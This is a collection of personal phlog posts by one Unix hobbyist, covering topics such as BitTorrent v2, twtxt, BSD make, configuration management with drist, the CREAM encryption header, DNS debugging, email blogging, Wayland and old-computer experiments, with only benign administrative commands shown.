z3bra.org phlog

BitTorrent specification v2

2020-09-08T21:22:00+02:00

BitTorrent specification v2 ────────────────────────────────────────────────────────────────────── Libtorrent recently released their work on the bittorrent v2 spec [0]. Given their widespread usage, it will certainly help adoption of the spec in other clients ! This could be a good time for me to blow the dust out of libeech [1], my Bittorrent library that was never finished, and apply some of the idioms I recently learnt. Maybe it will reach a usable state someday ? -- ~wgs [0]: https://blog.libtorrent.org/2020/09/bittorrent-v2 [1]: git://z3bra.org/libeech.git 20200908.2122

Broader protocol support for TWTXT

2020-10-21T22:49:00+02:00

Broader protocol support for TWTXT ────────────────────────────────────────────────────────────────────── I found recently a microblogging platform: twtxt [0]. It's main selling point is that it's decentralized and minimalist. The concept is simple: write your thoughts in a plain text file, one per line, prefixed with the date, and share it with others [1] : 2020-10-21T21:34:47+02:00 I am trying twtxt!197 1970-01-01T00:00:00+00:00 It's a Unix system! You « follow » people by fetching their twtxt.txt file periodically, and display all entries sorted by date. Multiple clients exist, and the format is simple enough to build a working client in a few minutes. Once your file is updated, you must share it with other users. There is a myriad of network protocols that can be used for this purpose: gopher of course, but also gemini, IMAP, FTP, SSH, SMB, WebDav, ... Heck, even HTTP ! However as I've found out after a few days of using it, all clients and user directories (registry.twtxt.org, twtxt.tilde.institute, twtxt,xyz, ...) only support HTTP links. This doesn't really fit the « built for hackers », and « minimalist » promise from the description. I love the simplicity of the specification. All it does is specifying a format for people to share thoughts around the world, in the most elegant way possible: plain text. This leaves the door open to so many ways to share and update this file, and enforcing the use of HTTP on its users can only deserve it. The gopher amd gemini community are particularly aware of the beauty of plain text, and twtxt totally fits this universe, so I think it would clearly be a benefit to just not exclude them. This post is a call to developers to add more protocol support to their twtxt clients. Not everyone is running an HTTP server, or wants to. Let's make twtxt truly decentralized, and open ! -- ~wgs PS: I would like to say « thank you » to vain [2][3] for being the first person ever to follow, and metion my name on twtxt, thus proving that it's possible ! [0]: https://twtxt.readthedocs.io [1]: gopher://g.nixers.net/0/~z3bra/twtxt.txt [2]: gopher://uninformativ.de [3]: https://www.uninformativ.de/twtxt.txt 20201021.2249

BSD make and built-in rules

2020-09-09T18:44:00+02:00

BSD make and built-in rules ────────────────────────────────────────────────────────────────────── I just realized a specificity of BSD makefile: there is no built-in rule to link a program for which you specify the object prerequesties. Take the following makefile, BSD make will automatically compile it as expected: $ more -e makefile pgm: pgm.c $ make cc -O2 -pipe -o pgm pgm.c Now try to make it generate an object file (the second line could be infered by make, but I added it for clarity): $ more -e makefile pgm: pgm.o pgm.o: pgm.c $ make cc -O2 -pipe -c pgm.c The target "pgm" is NOT generated ! This is actually what the POSIX spec for make specifies [0]. There is no built-in rule to build a target from a .o file, only from a .c file. And if you think about it, it make sense, because a single suffix rule to turn a .o into a binary would only work if you binary doesn't link multiple objects. so you'd better avoid creating the object file in this case, and use the .c rule… It means that when a binary must be built out of multiple object files, you have to specify the target rule: pgm: pgm.o util.o $(CC) $(LDFLAGS) -o $@ pgm.o util.o I guess I'll be rewriting makefiles in the next few days… -- ~wgs [0]: https://pubs.opengroup.org/onlinepubs/009695399/utilities/make.html#tag_04_84_13_08 20200909.1844

Configuration management

2020-08-24T11:32:00+02:00

Configuration management ────────────────────────────────────────────────────────────────────── Automation. This is a fairly vast topic, so let's start from the beginning. # Principles The first thing to do after setting up a server is configuring it, and then the services that it will run. This includes the following: - Nameservers - Installed packages - Running services - Service configurations - … Performing these configurations (in their simplest form) means creating files on the server, and running specific commands. Many tools are available to automate this process: - [ansible][0] - [puppet][1] - [chef][2] - … Each of them have their own strengths, and a declarative language used to describe the server state. All of them need you to learn a new DSL, and a new language to perform the task you would expect. There has to be a simpler way. As a sysadmin, and long-time Linux and BSD user, the language I'm the most familiar with is the shell. And as you certainly guessed, there is a tool for that ! # drist(1) By relying only on ssh(1) and rsync(1), [drist][3] is the simplest configuration management tool I know of. It works in a centralized fashion. You first create a module on the deployment machine: gopherhole/ ├── files/var/gopher/index.gph └── script The script file may contain whatever is needed to configure the service: #!/bin/sh pkg_add geomyidae rcctl enable geomyidae rcctl start geomyidae Then you apply the module on your server with: cd webserver drist -ps root@server.tld Everything in `files` will be uploaded on the server "as-is". Once all files are deployed, the `script` file will be uploaded, executed over ssh(1), and then deleted. All you need is an ssh connection to your server! Per-server configuration files can be uploaded by naming the `files` directory as `files-FQDN`. These files will then be uploaded only to the server who's FQDN match the directory name. # Rationale I love simple tools. Over the years, I got to use both chef and puppet in entreprise-grade environments. They work well for environments with thousands of servers, and their greatest advantage is that they provide a client/server configuration. Thus, centralization is built-in and makes it great to work in a team. Over the years I built a few servers to host various services, like emails, httpd, gopher, git, … Whatever. Setting up these servers is fun, but at some point I lost track of everything I did. At first I wanted to document it all, but documentation is doomed to lack behind at some point, so I figured the best way to "document" it would be to automate the whole configuration, so replicating it would only be a matter of commands I can easily read, and run again when needed. This is where drist(1) comes into play. By being a shell-first citizen, and simply being a local mirror for your configuration files, it becomes fairly easy to understand what it does. In the past few monthes, I'm slowly been migrating all my server configuration to drist, and ensuring that I could apply any module at any time without breaking anything. Some notable modules I made are - gopherhole - publish notes in my gopher hole - acme - check/update let's encrypt certificates - ssh_keys - deploy my SSH keys - syspatch - path/upgrade OpenBSD servers Configurations have never been so quick & easy ! [0]: https://ansible.com [1]: https://puppet.com [2]: https://chef.io [3]: gopher://dataswamp.org/0/~solene/article-drist-intro.txt 20200824.1132

CREAM header for encrypted streams

2022-10-24T14:15:00+02:00

CREAM header for encrypted streams ────────────────────────────────────────────────────────────────────── Symmetric encryption is a crypto algorithm where the same key is used to encrypt _and_ decrypt data. As opposed to asymmetric encryption, where there are two keys: one to encrypt, and the other to decrypt data. While this sounds more convenient because there is only one key to manage, symmetric crypto comes with a complex challenge: sharing the key with the other party. Whoever has the key can decipher the message, so extra care should be taken when sharing it with anyone. There are many ways to securely share a key, and one of them is to use Key derivation functions, or KDF. Key Derivation Function (KDF) ----------------------------- The idea behind this method is that, rather than sharing the actual key, the other party should be capable of recreating it, based on a secret value known to both parties (a passphrase for example). There are many algorithms to choose from for this purpose, but the best solution as of today (late 2022), is the Argon2[0] algorithm. Argon2 is well suited for this purpose, because it maximize the cost it takes to an attacker to recreate the key from a secret, making brute-force attack a non-viable solution. The algorithm takes multiple parameters into account: - Secret - the password to generate a key from) - Salt - Arbitrary data used to randomize key output - Memory cost - how much memory is needed to compute the key - Time cost - how many times to pass over that memory - Parallelism - how many concurrent threads to use If you change one of these parameters, the resulting key will be totally different. This means that all these parameters must be known to both parties for the encrypted conversation to happen. While the secret must be kept, well..., secret, hiding the other parameters is not needed at all. For convenience, they can thus be shared directly with the ciphertext, so the person decrypting it only has to know the secret. CREAM header ------------ This is where the CREAM header shimes in. Its sole purpose is to provide all these parameters to the decryption side in a compact header, to help with key derivation. Version 1.0 of the header is made specifically for Argon2: +-------+-------+------+------+----+-----------+----+ |CREAM\1|VERSION|BLKSIZ|MEMORY|TIME|PARALLELISM|SALT| +-------+-------+------+------+----+-----------+----+ Full header size is 40 bytes, and includes all the information needed to decipher the data appended to it. For more details, take a look at the cream(5)[1] manual page. Because it is prepended to the data, the payload (encrypted data) can be of any size, which allow encrypted streams of any size. I've implemented this format in the cream[2] utility, as a reference implementation, as well as in my personal secret manager, safe[3]. -- ~wgs [0]: gopher://z3bra.org/d/notes/argon2.pdf [1]: gopher://z3bra.org/0/man/cream.5 [2]: gopher://z3bra.org/0/projects/cream.txt [3]: gopher://z3bra.org/0/projects/safe.txt 20221024.1415

Debugging DNS propagation

2020-09-19T15:20:00+02:00

Debugging DNS propagation ────────────────────────────────────────────────────────────────────── I recently made a subdomain for phroxy(1), my http to gopher proxy [0]. In the process, I realised I had a resolution issue when accessing it (even after ,72 hours). Sometimes I could access the domain, sometimes I couldn't. At the time I used some random DNS, so I tried to resolve them directly at the source (my own DNS servers), and it resolved as expected... Weird issue. I tried a bunch of DNS propagation maps on the web, and it showed that barely 20% of worldwide servers could resolve this specific name, while resolving another, old name on the same machine hit 100% resolution. I first though about the sequence number, but it was correctly updated (I even incremented it again, to be sure). Then a collegue of mine gave me the key to this problem: dig +trace phroxy.z3bra.org That `+trace` here is the key. It show which servers are contacted to resolved your name, kind of like what traceroute does for ICMP. And it would never reach the servers pointed to by the NS records of my zone. So my zone was fucked up somewhere, in a way that prevented the DNS servers to be selected as authoritative on the zone. After taking a closer look at the zone, I found the issue, in the very first line: $ORIGIN rg. The full domain was cropped! It should have read « $ORIGIN z3bra.org. ». As I use short domain names in my zone, the $ORIGIN is there to complete the FQDN, and it wasn't doing it with the correct domain ! I fixed that line, incremented the seqnum, and deployed the zone again. Problem solved. The real game-changer for me was `dig +trace`. I never used it before, but it's definitely going to my debugging toolbelt ! -- ~wgs [0]: git://z3bra.org/phroxy.git 20200919.1520

Email blogging with scribo(1)

2020-09-08T15:44:00+02:00

Email blogging with scribo(1) ────────────────────────────────────────────────────────────────────── We had a discussion with prx [0] a while ago about blogging through emails. The idea is simple: send an email to a specific address, and the blog entry is automatically added to your log. A mail client is all you need to share your content! So we had this idea, and I honestly totally forgot about it, until recently. prx effectively released such a tool, under the cool name of "prose" [1]. I found it so cool that I had to give it a shot! git://z3bra.org/scribo.git It is still in its early stage, and I barely got something working. BUT IT WORKS ! I added the following to my /etc/mail/aliases: note@qw.is |/usr/local/bin/scribo -o index.gph Whenever I receive a mail at this address, it creates a log entry and generate the index file in a specific directory, owned by user _smtpd. Every 5 minute, a cron job rsync(1) the whole directory to my gopher server, for sweet publishing of content (my mail and gopher servers are different machines, making that setup a little bit more complex). To ensure that only I can publish notes, there is a verification on all incoming emails of the From: field, ensuring the a sender is indeed me. I'll only be trying it for a while, and if it works, I'll make it available in /phlog on this server. Stay tuned ! -- ~wgs [0]: https://prx.ybad.name [1]: https://ybad.name/Logiciel-libre/Code/C/prose.html 20200908.1544

Gopher text rendering ideas

2020-09-23T17:22:00+02:00

Gopher text rendering ideas ────────────────────────────────────────────────────────────────────── TL;DR: I would like to try a gopher client using monospaced and proportional fonts. Gopher is a text-based protocol, and as such is mainly used to share text files. Plain text doesn't come with any formating, like what HTML of or LaTeX would provide. As such, gophernauts assume all clients use at least a 70 char wide display, and a monospace font. If you take this paragraph, there is absolutely no added value for it to wrap at 70 characters. Proportional fonts are usually more pleasant to read. They're also more compact, meaning you can fit more text on a page. However, you need a monospaced font so this cute zebra doesn't look like a gull: ,, ______/ ¨/) *~'(/////// || || "" "" This make use of a technique called "preformatted text". So I had an idea. What if a client used proportional font for text blocks, and monospace for preformatted text ? You would need a way to figure out what is preformatted, what is raw text, and find the delimitation between both. The delimitation is easy. It's the same as with paragraphs: a new line. Whenever there is a new line character on its own, it means you get to start a new paragraph. Now what could be the difference between raw, and preformatted text ? I though about it, and I think that the main difference is the use of white spaces. When you write text, you really only need to put one space between words (maybe two after a sentence). However, with preformatted space, you (almost) always have to use whitespaces for formatatting. Be it to draw ascii art, or align stuff. Which means that you're very likely to find multiple whitespaces glued together. So how would that work ? The client would read the text data from the server, and buffer the input (that's mandatory!). You would need to buffer at least one paragraph, so buffer until you read 2 sequences of CRLF (or LF). Now you got a full paragraph. You can check inside for multiple occurences of the whitespaces, say at least 3 in a row. If you find 3 whitespaces, the the paragraph is "preformatted". You would then display it using a monospaced font. For anything else, use a proportional font. This is a pretty naive approach, yet it seems simple enough to work. I'll see if I can get something working, and see how it goes. -- ~wgs 20200923.1722

Happy time_t party!

2020-09-13T12:26:00+02:00

Happy time_t party! ────────────────────────────────────────────────────────────────────── Today is a special event in the Unix timestamp history. At 12:26:40 UTC, on september de 13th of 2020, the timestamp reached 1600000000. Next major event will be in 3 years, for the next round number, so see you there ! -- ~wgs 20200913.1226

IDEA: multipart/mixed support for scribo

2020-10-06T17:42:00+02:00

IDEA: multipart/mixed support for scribo ────────────────────────────────────────────────────────────────────── I am writing this post from my phone, somewhere in the Reunion islands. This place is beautiful, majestic ! I crossed mountains one day, dove in corals the next day, eating delicious food and meeting even more delicious people. I've been away from a computer for the last 2 weeks, and as such didn't work or played with anything technical I could share on this phlog. However, I still did some stuff worth sharing, because this island is so beautiful. Unfortunately, my phlogging « engine », scribo(1), which converts emails to phlog entries only accept text/plain mimetypes. I figured this would be sufficient, given that gopher is a text-oriented protocol. However, I realize here that I would like to share more than just plain text. At least pictures. So I think the next improvement to scribo would be supporting images/* mimetypes, first as an entry of their own, using the subject as a legend, and then support for, maybe, multipart/mixed, so I could send text with images, and reference them. I'll have to read about the RFC a bit to know how that works, but that could definitely be a great improvement. At least it would fill the gap I'm missing today... In the mean time, I'll upload some pics manually from my phone (thanks sailfishos that I can use rsync(1) natively!), so I can share them here. Peace, love, phlog 💋 -- ~wgs 20201006.1742

I'm on Lemmy now!

2023-07-05T21:38:00+02:00

I'm on Lemmy now! ────────────────────────────────────────────────────────────────────── Following reddit's decision to monetize their public API, I decided to simply get off the platform. I'm however a fervent lurker, and love to mindlessly scroll through links and memes posted by random people. Hopefully for me, a bunch of nerds were already working on a decentralized link aggregator: Lemmy[0] (see also kbin[1]). It's a link aggregator one can self-host, but which can talk to other software involved in the « Fediverse ». Long story short, all servers can communicate together, and with an account created on website A, you can read, post and comment on website B. Many software use this principle of federation, starting with emails (but also Mastodon, Matrix, …). Because of reddit's fuckery, the « Lemmyverse » exploded, and saw a massive amount of users looking for a better land to post memes (and I'm definitely one of them). I decided to join through the SDF instance[1], as it's the community I feel closest to because of their interest in reviving old techs! I never had the occasion to create an account there because I already selfhost my own website, gopherhole and every other service they propose, but this time I have not interest (yet) in running my own Lemmy instance, so it's the perfect time to be one of them, yay! You can now contact me on lemmy as @wgs@lemmy.sdf.org[3], see you there! -- ~wgs [0]: https://join-lemmy.org [1]: https://kbin.pub [2]: https://lemmy.sdf.org [3]: https://lemmy.sdf.org/u/wgs 20230705.2138

KVM switches for the desktop

2020-12-16T04:50:00+01:00

KVM switches for the desktop ────────────────────────────────────────────────────────────────────── Wether we want it or not, the 2020 pandemic changed the way the industry works. For me, it meant working remotely 90% of the time. I could bring my company's docking station, screen and laptop home, to work from here. This sounded cool until I realized how small my « desk » really is [0] ... On this desk are connected my personnal computer (tower build), work laptop (docked) and a PS4. I can fit them all on this desk ! Hooray ! What's tedious though, is switching between them. Let's cconsider 2 use cases: - Switching from my tower to PS4 - Switching from my tower to the laptop So here I am, chatting on IRC or browsing the gopher space on my computer, when a friend calls me up to play video games. It takes quite a few steps: 1 - Turn on the PS4 using the controller 2 - Plug in my headphones to the controller 3 - Switch monitor input to HDMI 4 - Replug the mouse from my tower to the PS4 5 - Plug a new keyboard to the PS4 And I'm set ! A few explanations here. I must plug headphones to the controller because the PS4 only has 2 USB ports, which I use for keyboard and mouse. And as my monitor doesn't have speakers, I must use the controller for sound output. I use another keyboard rather than the currently plugged in to avoid having to unplug 2 devices from my tower. It's more "convenient". When I'm done, I just put it away. When switching back to my tower, I just do the same tasks in reverse. Now, here is my « working commute » (switching from tower to work laptop) : 1 - Turn on/wake up laptop from the dock 2 - Switch monitor input to Display port 3 - Turn on the wireless mouse 4 - Swap cable connected to my keyboard This is a bit simpler. I use a wireless mouse plugged to the dock so I don't have to swap my main mouse which is plugged behind my desk, and thus hard to reach. Same goes for the keyboard, which is why I have two cables that I can plug to the keyboard to « switch » computers. So switching between my tower and work laptop doesn't require going under the desk, Yay ! You certainly understand how tedious this is, and when I heard that we might eventually keep working remotely for a few more months, I decided it was the time to optimize that workflow. That's when I bought a KVM switch, which stands for « Keyboard, Video, Mouse switch » [1]. It's a device that lets you connect your KVM devices to different computers, and switch them using a simple button press. I bought one with 4 inputs, with HDMI support. Its main advantage is its compactness, and that plugs are packed on only 2 sides, helping with cable management. Since I have this device, switching between my 3 computers is as simple as pressing a button ! I use the same mouse/keyboard everytime, which is much more comfortable as well. I though that KVM switches were a datacenter thing. Nope, and I wonder how I did without it all these years ! -- ~wgs [0]: gopher://z3bra.org/I/u/tiny_desk.jpg [1]: gopher://z3bra.org/I/u/kvm_switch.jpg 20201216.0450

My love-hate relationship with Wayland

2020-11-06T17:28:00+01:00

My love-hate relationship with Wayland ────────────────────────────────────────────────────────────────────── # The X windowing system, and me It took me years to come up with the X11 setup I currently have. I had to learn Xlib and XCB programming in the process, because I wanted an experience so sweet an tailored to my needs that I wrote a shitload of tools [0][1][2][3][4], just for the sake of learning how the venerable X.org server works internally. I learnt a lot of stuff in the process. About the X protocol and libraries, of course, but not only. Because of the complexity of its interface and architecture (I'm not saying this in a pejorative way!), I had to learn how to read the documentation (XCB ? Documentation ?), understand its inner concepts, organize my code better and force myself into a discipline I didn't have before. Building programs for my X environment also helped me think about what I need to feel comfortable when using my computer. What makes my workflow more fluid, or what slows me down. I quickly realized that tiling window managers were not for me for example, and that I need a quick way to move windows at to opposite side of the monitor, in a different size. That why cwm(1) quickly became my best friend for managing windows. When I wrote glazier [3] later, I use cwm as my model, and ended up creating a somehow stripped down version of it, on top of XCB rather than Xlib ! Then came Wayland. [0]: https://github.com/wmutils/core [1]: https://github.com/wmutils/opt [2]: git://git.z3bra.org/xmenu.git [3]: https://z3bra.org/glazier [4]: https://z3bra.org/man/ewmh # Wayland, take one (2014) I really heard about Wayland a few years ago, back when I was discovering Linux, and especially aesthetics of a Linux desktop. At the time, I was trying hard to make my desktop look good to me, and was spending much more time "improving" my workflow, rather than doing any real work. It was pretty fun though, and helped me get into the deepest corners of my operating system configuration, including replacing the init system just so my "ps" output could fit on a single terminal page ! During my explorations, I stumbled upon a video showcasing a 3D Wayland compositor [5]. The video shows a 3D where the user navigates like in an FPS game, put application windows on the walls, and navigate between them by "walking around" the desktop. THAT WAS SO COOL ! So I looked into this "Wayland" thing, and discovered that this was a competitor to the well-known X server, which I was still experimenting with, but was slowly starting to show its limits in terms of customisability. I read the Wayland introductory post, and started looking into how I could test it out, and what could be *actually* done with it. And as it turned out… Not much. Back in the days (around 2014), the only "viable" option was to use weston, a compositor made to showcase Wayland, rather than do any actual work. It featured a terminal (weston-terminal), but that's pretty much it. You couldn't even get a web browser running, so that was FAR from usable. I wanted to do customizations, tuning, modifications, try new concepts… Not feel stuck in a totally meaningless desktop environment. And so I did what every IT hobbyist does in the Unix world when a new technology appears to "replace" and older one: join the hate bandwagon ! It was pretty easy to hate it at that time. It was advertising as the new challenger, yet nobody adopted it, there was nothing useful made out of it, and the only "documentation" was the code of the single, useless, application available: weston. I remember trying to look at that code and was so horified that it reinforced my hate against it. It was at that time that I decided that X.org wasn't going anywhere, and that I could invest some more time to learn how it works internally and start making software for it. We (dcat and I) came up with wmutils [0], which is to this day the most "famous" software I wrote, even though it targets a small niche. [5]: https://youtu.be/_FjuPn7MXMs # The Plan9 operating system Years were passing and I stopped caring about how my desktop *look*, to concentrate on what I could *do* with it. I started contributing to more meaningful software, to perform data deduplication [6] for backing up my family pictures, securely storing my passwords [7] and so on… I also started looking into other operating systems, mostly OpenBSD (which powers all my servers!), and Plan9. Plan9 was a fascinating discovery at the time. The system was so elegant, and consistent that even OpenBSD looked messy compared to it (not even mentioning Linux !). Since I discovered it, I've been admirative about it, without ever giving it a try. Not even plan9ports ! I've however read the research paper quite a few times, and integrated some concepts in my day-to-day computer usage, like embracing the mouse for the correct use cases, rather than being a "TILING WM FTW, LUV KEEB, MOUSE SUCKS LOL" kind of guy. [6]: git://git.2f30.org/dedup.git [7]: https://z3bra.org/safe # Wayland, take two (2019) A couple years passed, and I started hearing about Wayland more and more. There was this guy who created a simple WM for wayland, "swc", and everyone was so enthusiastic about it! This was the first time I heard about someone doing ACTUAL work for Wayland. Of course I heard about GTK and Qt providing bindings for it, but it didn't really interest me. This new window manager, however, was the proof that real work was starting on Wayland. Then came "sway", the compositor meant to be the i3 window manager for wayland. Later on, a new library named "wlroots" came out of it, and started gaining widespread usage. I was hearing more and more people succesfully "switching to wayland for the desktop", and I started being curious again. I looked into some Wayland articles here and there, out of curiosity rather than from real interest… Then Drew Devault, the creator of the famous "wlroots" library posted this article: https://drewdevault.com/2019/05/01/Announcing-wio.html It was announcing the initial release of "wio", a wayland compositor replicating the rio(1) window manager from Plan9. THAT WAS SO COOL ! I read about rio multiple times when looking at Plan9, and tried to replicate its usage under X multiple time, in vain. And this guy come up with a Wayland compositor doing exactly that ? This was the time for me to stop hating on Wayland, and actually look into it. I started reading about it as a protocol, as a library, how it differs from the X server, and why this is a good thing. To be totally honest. I didn't understand. It was still to complex for me to understand, and I started hating it again, this time for a *real* reason: I could not understand it. From the other feedbacks I had, many stuff were still imprecise and not working. Most people on wayland had to resort to "Xwayland", that could let them run X software under wayland. It felt hacky, and I decided I didn't want wayland anymore. # Crux, OpenBSD and the lost drives By the end of 2019, I bought myself an SSD for my workstation, deciding that recycling old hard drives was great for the planet, but not so for my sanity. Reinstalling your OS often because your drives fail is good for practicing and cleaning up, but it gets boring over time and cleaning up, but it's boring at some point. When I got that SSD, I decided to try OpenBSD as a workstation, and slapped it on my SSD real quick. I was happy, until I realized that I could not mount my existing /home and /var/data partitions, because I used LVM for partitionning my 1Tib harddrive, which stores all my data. That's how the SSD took dust. By the end of the year, a pandemic known as Covid-19 stroke the whole world, and eventually resulted in a full country lockdown in march 2020. This left me with a lot of time on my hands to eventually do stuff that were on my TODO for a while, which includes setup up a good backup system for my data. That's fortunate because a few weeks later, my 1Tb drive died spectacularly, taking with it all my data, and /home partition. That's only a few month later that I replaced this failed drive. This time I decided to go for a filesystem I could use on both Linux and OpenBSD, that is, well, nothing actually. The only common filesystems between Linux and OpenBSD are FAT32 and ext2, which I didn't want to use at all. I then gave up on OpenBSD, and decided to reinstall my current OS, Crux [8] on the SSD, when I have some time. [8]: https://crux.nu # Wayland, take three (2020) Tech news come in waves. You do not hear about something for months or years, and all of the sudden, everyone is debating it ! This is true for Wayland, up to the point I read a post about X.org being tagged as "abandonware" [9]. This article made a lot of noise in the wayland community and got many replies [10][11][12][13]. These discussions convinced me that Wayland was now usable, and I decided to look into it. Again. And so did I… [9]: https://www.phoronix.com/scan.php?page=news_item&px=XServer-Abandonware [10]: https://lobste.rs/s/vqv6nu/it_s_time_admit_it_x_org_server_is [11]: https://ajaxnwnk.blogspot.com/2020/10/on-abandoning-x-server.html [12]: https://lobste.rs/s/qtplaa/on_abandoning_x_server [13]: https://arewewaylandyet.com # Crux and the X-less ports As of november 2020, we're going for a lockdown again, as the (in)famous "second wave" of Covid-19 strikes again. As I get to spend more time home, I decided to reinstall Crux on the SSD, with a special twist this time: The X server won't be installed at all ! This will force myself into embracing and understanding Wayland if I want to use my computer. As time passes by, I'll certainly hit some shortcomings of wayland, but I'm decided to actively participate in its deployment this time ! I gave Wayland a quick try first (using X11 as the backend), to make sure that the software I planned on using (wio, cage, alacritty and firefox) were usable under wayland), and started porting them on crux. I made myself a "wayland" port tree, and started looking into what is needed for running wayland natively on my desktop. I'll be documenting what I find along the way, and collect thoughs on my findings. You'll find them on my gopher hole, under /notes/wayland, along with this "introduction". As a conclusion, I'll say this: Only fools never change their minds. Don't hate on a technology just because you don't see the point, or don't understand it, because you might embrace it later on. Unless it's systemd. It just plain sucks. Be happy, stay cool, and contribute ! ☮️ 20201106.1728

My top 10 commands

2020-10-27T23:36:00+01:00

My top 10 commands ────────────────────────────────────────────────────────────────────── “Show me what you type and I'll tell you who you are„ This week, my shell command history hit 10000 lines ! To celebrate, I decided to check what are the 10 commands I use the most: $ history|awk '{print $2}'|sort|uniq -c|sort -rn|head -n 10 1550 v 1492 ll 870 make 787 cd 503 git 426 pwd 372 fg 245 ssh 206 doas 192 man 1. v (alias « vis ») Fortunately, I was smart enough to alias my most used command to a single letter ! "v" is an alias for "vis", my text editor of choice. I use my computer mostly for programming, and editing server configs, and the fact my editor is the first command of the list proves it ! Nothing really interesting here after all... 2. ll (alias « ls -l ») If I could only have a single-key keyboard, then I'll pick the « L » as the only letter. I call this one my stress-ball. Whenever I think or need to relieve stress, I type « LL », immediately followed by « L » to clear the screen, so I can run « LL » again. 3. make Now this is getting interesting ! Do I do this much C programming that I use « make » so often ? Actually no. I use « make » for another purpose: server configuration. I own multiple servers online, and configure them with drist [0], which is similar to ansible. To simplify the configuration deployment, I use a Makefile, so I just need to type « make » to reconfigure a server. Everytime I change a config file, add a DNS name, or username, I run « make » to apply my changes, which is why I run it so often. I also build a lot of C programs too, but configuration management is certainly my main usage these days. 4. cd There is one thing that frustrate me when I look at other people using a terminal : cd /var cd log less messages When people do that, I want to take the keyboard away from them, and beat them up with it !! Ok I'm weird. But seriously, I hate monkeying around in my filesystem. If I want to read the logs, I'll just less /var/log/messages It works, it's elegant, it makes « cd » only appear 4th in you command history rather than first 😉 5. git Well, I didn't know I used git that much. It shouldn't surprise me though, because I constantly search new cool projects to try, and git clone them. Another big use I have for git, is updating my port tree, as I run the crux distro [1], with a lot of git based ports. 6. pwd I get lost quite often in all these gigabytes ! 7. fg (and its friend ^Z) This is certainly the most idiomatic command of my programming workflow. I mostly write shell scripts and C programs, which I test/build manually at the shell prompt. I could use a terminal multiplexer, but I like having a single place to focus my attention on. A typical programming session would look like this: v file.c # see command number 1 ^Z make [...] outpout omitted fg ^Z make ./file git add file.c; git commit -m "WOW it works !" fg man 3 gethostbyname ^Z fg %1 ^Z fg %2 ... I put my editor to the foreground all the time. Even though it has support for splitting windows, I run it multiple times when editing multiple files, and play with job ids to call them back. It might sound slow, but I'm really used to it and feel like I'm pretty efficient. I must admit that sometimes when I'm tired, I might end up with the same file opened 3 times in 3 different jobs... This is usually a good sign that I need some sleep ! 8. ssh What would be life without exploration ? I use it mostly to administer my servers, or connect to my IRC session, which is hosted on one of these servers. Nothing fancy here. 9. doas This is the OpenBSD equivalent to « sudo ». Since I reinstalled all my servers to OpenBSD, I started using « doas » to administer them (I never log in as root). I got so used to it, that I started typng « doas » instead of « sudo » on my own machine. And as crux doesn't come with « sudo » installed by default, I eventually replaced it with « doas ». The same phenomena is happening with « rcctl » vs. « systemctl » on my work laptop. I might add an alias someday ! 10. man To be honest, I'm proud to see it in this list. I love man pages, and prefer them over stackoverflow answers. With OpenBSD, I learnt to use them more, and took the habit to read the manual instead of searching the internet. This helped me a lot when programming in planes or trains, where you must work offline. I'm proud to finally have a proof that I RTFM ! What started as a bored question ended up in a good introspection of my terminal habits. This was a funny exercise, and I would recommend it to everyone that uses a terminal often. Now what are YOUR top 10 commands ? -- ~wgs [0]: gopher://phlog.z3bra.org/0/configuration-management.txt [1]: https://crux.nu 20201027.2336

Official nixers.net gopher space

2020-09-17T15:59:00+02:00

Official nixers.net gopher space ────────────────────────────────────────────────────────────────────── I recently came back into the gopherspace, and wanted to bring more people with me this time, so I have other people to discuss that with. To achieve that, I built a new server (xaero.z3bra.org) to host a gopherspace for the nixers.net community. I hope we'll also see cool contributions to the gopherspace from the members, as a bunch of people were curious about gopher, without knowing how to get started with it. The gopher hole is accessible here: gopher://g.nixers.net If you want an account, feel free to contact me, and perhaps join the nixers.net forums [0], you'll be welcome ! ===== This is the second time I build a multi-user machine, so I'm still learning how to configure a host that might be accessed by "strangers". This community is small, so I doubt I'll encounter any hostile behavior from the users. However, I'd still like to learn how to properly configure those remote access, and limit their resources. Guess I'll have to read that scary login.conf(5) after all… I hope I'll manage to keep the system clean, and under control. It's currently managed with drist(1) (thanks again, solene !). But I'd like to make it more like a gateway were people can connect to access more stuff, like the yggdrasil or dn42 network. I'll see what people are interested in. Wish me luck ! -- ~wgs [0]: https://nixers.net 20200917.1559

Old Computer Challenge V3

2023-07-18T22:07:00+02:00

Old Computer Challenge V3 ────────────────────────────────────────────────────────────────────── > gopher://occ.deadnet.se/1/users Day 0 ===== I only learn about the challenge on the first day. Hopefully I have the perfect challenger for this task: my trusty Acer Aspire One from 2009. Equipped with an Intel Atom clocking at 1.6GHz, 1Gib of RAM and a 250Gb hard drive, it barely needed any limitation to fit in the challenge. I grab it from the shelf, blow the dust out of it and powers it. Without much surprise, it boots into the 5 years old Void Linux I had setup and forgot about. I plug it in to reflow it with some juice, and ends the day. Day 1 ===== I decide to finally install OpenBSD on this thing, and to make it work. Years ago I had issues with the WiFi card not being usable, but it should be fixed now right? Obviously not. After failing at using urndis(4) to use my phone's connection over USB, I eventually found a working WiFi card in an Asus Eee PC from the same era. It took me quite some time and patience, but I got OpenBSD up and running, with an internet access that's reliable! The rest of the day will be spent setting up my environment, which features many software that must be compiled, either to configure them, or because they're not packaged: - abduco 0.6 - dmenu 5.2 - glazier 1.1 - human 0.3 - lel 0.2 - libwm 1.3 - pm 1.4 - randr 0.0 - sacc 1.06 - webdump 0.0 - wmutils 1.7 - xmenu 0.0 - xrectsel 0.3.2 - xscreenshot 0.0 - xwait 5.7 And that's where I hit my first OCC limit: with a single core at 1GHz, everything is slow when you're compiling stuff in the background! Hopefully these software compile rather fast, so I just had to wait a few seconds before using the computer again. With the environment setup, it was time to actually use the computer. So I decided to brag about it on the web. I knew for a fact that firefox cannot run on this machine, even at its full potential, because I tried it already, and failed miserably. So I installed netsurf right away as my gateway to the world wide web. And here is the second limit: It turns out that netsurf doesn't start with Javascript enabled. 512Mib of RAM just isn't enough for it apparently, so I disabled that. I could browse few website and access online resources I need to fix issues I had with the configuration of OpenBSD, but that's pretty much it. The web of today requires javascript to interact with it. I close the notebook on this unsurprising fact. Day 2 ===== Unfortunately, this would be my last day for the challenge. I would be on holidays the next day, with no plan to do any computing. This would also be a very short day, as my workday turned out to be very busy. I simply spent the night chatting on IRC from this cool little notebook I have, happy that I revived it once again for no valid reason :) Closing word ============ I cannot consider this challenge a success. I came in to late, and could only use the notebook for 2 days, not doing anything meaningful. I'm however happy to finally have been able to slap OpenBSD on it, and I'll definitely keep using this thing when I'm on the go, as the form factor is simply too practical! The battery is also surprisingly good for a cheap computer of the past decade. I'll definitely use it again for next year's challenge ;) Bonus ===== Pictures of "sorlag": 